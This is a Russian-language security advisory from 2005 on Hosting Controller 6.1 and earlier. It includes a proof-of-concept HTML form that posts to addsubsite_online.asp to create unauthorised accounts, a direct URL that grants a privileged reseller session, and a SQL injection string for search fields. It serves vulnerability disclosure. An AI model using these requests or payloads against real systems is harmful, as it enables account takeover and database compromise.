Security Lab

Обход ограничений безопасности и SQL-инъекция в Hosting Controller

Дата публикации:14.07.2005
Всего просмотров:1269
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Hosting Controller 6.1 Hotfix 2.1 и более ранние версии

Описание:
Обнаруженные уязвимости позволяют удаленному авторизованному пользователю обойти ограничения безопасности и выполнить произвольные SQL команды в базе данных приложения.

1. Удаленный авторизованный пользователь может послать сценарию '/admin/hosting/addsubsite_online.asp' специально сформированный POST запрос и создать новую учетную запись в приложении. Пример:

<FORM action="http://[target]/admin/hosting/addsubsite_online.asp" method="post">
< INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
< INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
< INPUT type="hidden" name="htype" value="27" id="htype5" >
< INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
< input type="submit" value="Make">
< /FORM>

2. Удаленный авторизованный пользователь может создать сессию со специальными привилегиями с помощью URL:

http://[target]/admin/hosting/dsp_newreseller.asp

3. SQL-инъекция возможна из-за недостаточной фильтрации входных данных в полях формы поиска в сценариях 'IISManagerDB.asp' и 'AccountManager.asp'. Удаленный авторизованный пользователь может послать специально сформированный запрос и выполнить произвольные SQL команды в базе данных приложения. Пример:

'or'1'='1'or'1'='1

URL производителя: hostingcontroller.com

Решение: Для 1 и 2 уязвимости существует исправление, которое можно установить с сайта производителя.